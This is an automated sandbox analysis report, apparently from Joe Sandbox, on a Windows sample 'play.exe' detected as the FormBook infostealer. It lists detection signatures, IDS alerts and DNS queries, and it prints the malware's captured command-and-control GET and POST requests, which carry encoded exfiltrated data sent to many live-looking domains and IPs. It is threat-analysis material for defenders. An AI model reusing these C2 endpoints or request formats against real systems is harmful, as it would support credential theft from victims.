Windows Analysis Report
play.exe

Overview

General Information

Sample name: play.exe
Analysis ID: 1502191
MD5: 22b582f31bd1c3a4345df16db968b74c
SHA1: 0756ad4a5bb0afefb30e7fc0e581203b52ab515d
SHA256: 9c1aee7c67abdbfcafee208e0a64ab065cd336d550f1cd66fe91679e9253903a
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

AV Detection

Source: play.exe ReversingLabs: Detection: 55%
Source: play.exe Virustotal: Detection: 58%
Source: Yara match File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: play.exe Joe Sandbox ML: detected
Source: play.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: play.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: relog.pdbGCTL source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: relog.pdb source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aAqvujXSGNo.exe, 00000004.00000000.1976786977.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4103761428.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: play.exe, play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_008CC700 FindFirstFileW,FindNextFileW,FindClose, 5_2_008CC700
Source: C:\Windows\SysWOW64\relog.exe Code function: 4x nop then xor eax, eax 5_2_008B9AA0
Source: C:\Windows\SysWOW64\relog.exe Code function: 4x nop then pop edi 5_2_008BE28E
Source: C:\Windows\SysWOW64\relog.exe Code function: 4x nop then pop edi 5_2_008D2828
Source: C:\Windows\SysWOW64\relog.exe Code function: 4x nop then mov ebx, 00000004h 5_2_031004E8
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4x nop then xor eax, eax 6_2_0530162F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4x nop then pop edi 6_2_052FC17A
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 4x nop then mov ebx, 00000004h 7_2_000001917363E4E8

Networking

Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58093 -> 199.59.243.226:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58141 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58108 -> 84.32.84.32:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58133 -> 154.23.176.197:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58103 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58102 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58109 -> 84.32.84.32:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58125 -> 52.71.57.184:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58099 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58106 -> 84.32.84.32:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58121 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58112 -> 154.23.184.218:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58138 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58105 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58101 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58110 -> 154.23.184.218:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58135 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58100 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58142 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58131 -> 154.23.176.197:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58136 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58119 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58117 -> 200.58.111.42:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58116 -> 200.58.111.42:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58134 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58107 -> 84.32.84.32:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58124 -> 52.71.57.184:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58113 -> 154.23.184.218:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58118 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58098 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58096 -> 3.33.244.179:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58111 -> 154.23.184.218:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58114 -> 200.58.111.42:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58126 -> 45.113.201.77:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58115 -> 200.58.111.42:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58143 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58095 -> 3.33.244.179:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58128 -> 45.113.201.77:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58130 -> 154.23.176.197:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58123 -> 52.71.57.184:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58140 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58094 -> 3.33.244.179:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58097 -> 3.33.244.179:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58122 -> 52.71.57.184:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58104 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58120 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58127 -> 45.113.201.77:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58137 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58132 -> 154.23.176.197:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58129 -> 45.113.201.77:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58139 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58144 -> 188.114.96.3:80
Source: DNS query: www.farukugurluakdogan.xyz
Source: Joe Sandbox View IP Address: 13.248.169.48
Source: Joe Sandbox View IP Address: 199.59.243.226
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: DattateccomAR
Source: Joe Sandbox View ASN Name: BODIS-NJUS
Source: Joe Sandbox View ASN Name: NTT-LT-ASLT
Source: Joe Sandbox View ASN Name: COGENT-174US
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /184n/?fVU8=HRzx&ZXzt1jdX=tTw8bcF9ynF7NxNhIHnuE7PiwszZpdssllgSy53HU9FeypU+H5DHpDJo8VdiQv3xpb0wKqaBA5vXWKI3ejJljZEG/7rnegNjrXxjwHY74ScRyh8HTmiatRM= HTTP/1.1Host: www.dom-2.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx HTTP/1.1Host: www.soliro.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM= HTTP/1.1Host: www.playdoge.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx HTTP/1.1Host: www.farukugurluakdogan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno= HTTP/1.1Host: www.pacoteagil.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx HTTP/1.1Host: www.23ddv.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx HTTP/1.1Host: www.pilibit.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4= HTTP/1.1Host: www.astrocloud.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /49cz/?ZXzt1jdX=jojqsqROcSZ/YEZnqnzfA751mBAelv+z1FKsCArF5g8fu/bWNXnvEEANdKHh77itbEpRc/umBoU8ELsN52AVYzrBAQ0zHIll5d6B3+Pe+PauASdNc9uZplY=&fVU8=HRzx HTTP/1.1Host: www.rantup.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /90p1/?ZXzt1jdX=MVS+namUa0UQavAdJ03s9uygERI+uY3eTsOcU3Wjrfb6xHYz5dyozzt8oos7zGJG9hFOZSWQuwu+QIVHqyXNg2+Ky1HzvorxqHxW6JBLA1lJwD0Ad7NFYWY=&fVU8=HRzx HTTP/1.1Host: www.sssqqq07-22.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /qer4/?ZXzt1jdX=UQTe8T+Iiqz9DT0FlyqPvcGPqOgPe8+u3s7KU5oKxN2bJ9UfIOk7myDXpD+ZujeoMjeiGDcwHIyYgzCoICrrm0QdeA2m/FQRgN8WzYZXzVLDjgJaJykIP/c=&fVU8=HRzx HTTP/1.1Host: www.shipincheshi.skinAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /byvv/?fVU8=HRzx&ZXzt1jdX=tE8Yf8WYynwECT0ucMl0wg/uU5lgFM4d0lH0abgHpBN2sUJXXfRRiqZbMUuokEJXmaYUQiqZbA9PoCScD7vXiY1sERFkkaBh5gb6EBRxs5CGi9vgIcMFHkg= HTTP/1.1Host: www.ablackwomansmarch.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic HTTP traffic detected: GET /vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G+FujZTnvobDNePA17XvJlKosOwY30TiI8/8bBp7iesbvq7jnISR7nTIeFXysPRp6fhppRWXfcEPYVY19hX8MgB2Jw=&fVU8=HRzx HTTP/1.1Host: www.kiristyle.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: www.dom-2.online
Source: global traffic DNS traffic detected: DNS query: www.soliro.life
Source: global traffic DNS traffic detected: DNS query: www.playdoge.buzz
Source: global traffic DNS traffic detected: DNS query: www.farukugurluakdogan.xyz
Source: global traffic DNS traffic detected: DNS query: www.pacoteagil.shop
Source: global traffic DNS traffic detected: DNS query: www.pelus-pijama-pro.shop
Source: global traffic DNS traffic detected: DNS query: www.23ddv.top
Source: global traffic DNS traffic detected: DNS query: www.pilibit.site
Source: global traffic DNS traffic detected: DNS query: www.astrocloud.shop
Source: global traffic DNS traffic detected: DNS query: www.rantup.com
Source: global traffic DNS traffic detected: DNS query: www.sssqqq07-22.fun
Source: global traffic DNS traffic detected: DNS query: www.shipincheshi.skin
Source: global traffic DNS traffic detected: DNS query: www.ablackwomansmarch.info
Source: global traffic DNS traffic detected: DNS query: www.kiristyle.shop
Source: global traffic DNS traffic detected: DNS query: www.x0x9x8x8x7x6.shop
Source: unknown HTTP traffic detected: POST /qkji/ HTTP/1.1Host: www.soliro.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: no-cacheOrigin: http://www.soliro.lifeReferer: http://www.soliro.life/qkji/User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1Data Ascii: ZXzt1jdX=6jmeEH8YiR/6wYdEJ7jxHO9u8YGDsUwRnFzZOVTNNIcFtDpbW5Lbr3V7EbqjkptJ7MuI9p6nR4r2nMHkOzQkTXa75BPmpcnquuXGRuIh6HXY+BLQ/B1nWhs58+6E7jLx4WHwlxGIz8923qsKX/SzyGF7pTXGoVrJuSaVqWE+cyok5bfyhERWwn1/ra8sWcq90A==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYGPKBluqdZiBC4TFP%2FOeD9eFU%2BPTr2U7PPOi9n%2B0sH5hjdurdVj9TCNKt61YwK%2FKKu6cxLFhn%2BD%2BtfgNlX4bk0DMqt2s6TwL26wEAm32x91qK1QLMI5zsqIfgXrYQHKaLOddA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce1e7c9620f3f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Saxbh3XZbzatdsLCj8P8CisZ6wL7kM0wkeAgbhBDhQ7XNu3oj1htr5UzP%2FwrgyQcxDdaj0s0%2BVLHZVzv994iblhRr%2B7v4b7poApAbrNsfsDMYiaJkj55Z%2BejkCr69T55dwvfmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce1f7ce2b436c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLC0p9NnwOnRhL%2BhpHt8oYW5aC%2F3%2FOm8%2FABUV2cSWcfrv8%2FB6859qLQYvk2%2BPPqE6KNBeXmay9wA0yBXuSl4XdWglYLvqP%2BSxToL0BlXokgCE%2FaPt4nbuxMiCW3qwCQE2Tz%2Flg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce207affa0f49-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86bjImJuA%2F0n%2FLRlXncLifTMO8foW0m6pZmkbOKPGuEQliLrgn%2FOSmy2p3N1nV81Fms1VX0qapfeTVy4RQ%2FS95kODoe8MNPU5IjsdAj1jTgB4QrN74KSuWY%2FaXhwVHl6pa9JRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce217be612363-EWRalt-svc: h3=":443"; ma=86400Data Ascii: 4e0<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
